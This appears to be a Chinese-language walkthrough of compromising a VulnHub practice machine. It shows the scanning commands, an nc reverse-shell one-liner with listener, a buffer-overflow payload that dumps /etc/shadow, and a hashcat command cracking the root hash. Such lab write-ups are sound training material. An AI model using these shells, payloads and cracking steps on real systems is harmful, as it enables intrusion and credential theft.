靶机
靶机来源vulnhub
下载 ova文件,VM 或 VB 都是可以直接打开的
渗透
具体可以详细可以参阅 YouTube
我这里来记录下我的过程
扫主机
nmap 10.0.0.0/24我的是这个网段
或者直接使用netdiscover进行主机发现,比不过比较慢
我这里的靶机IP是10.0.0.141
扫服务 nmap -A 10.0.0.141 扫出具体的端口及其服务。
发现 22 端口和 80 直接访问80
打开看是一个登陆页面,随意点点看,有个登陆页
后台路径遍历
dirb http://10.0.0.141 /var/share/wordlists/dirb/common.txt
没有扫出什么有用的,搞登陆页
登陆页
弱口令试试,没发现什么。hydra 爆破 http有待学习,
根据视频提示username 参数有代码执行
代码执行
这里直接上一个nc的反弹shell
nc 10.0.0.141 8848 -t -e /bin/bash
攻击机这边监听
nc -lnvp 8848
界面不好看,上一个python的pty
python -c "import pty;pty.spawn('/bin/bash')"
一个有溢出的文件
在/home/silky目录下有个cat_shad的文件,我们把它下载下来
python -m SimpleHTTPServer 8822
SimpleHTTPServer这个是python自带的库,注意大小写
下载好后,直接ida看一下,发现需要溢出覆盖参数 ‘a’* 0x40 + flag 这个flag就需要是 0x496C5962 由于是小端序所以我们的脚本要这样写
python -c “print ‘a’*0x40 +’\x62\x59\x6c\x49’”,这样的结果是我们输入的结果了
学习一下这个命令
./cat_shadow $(python -c "print 'a'*0x40 +'\x62\x59\x6c\x49'")
这样可以直接回显shadow文件,然后使用hashcat 爆破root 密码
sudo hashcat --force -w 3 -a 0 -m 1800 --remove -o linux.out linux.int /usr/share/wordlists/rockyou.txt
我虚拟机给的双核,10分钟就跑出来了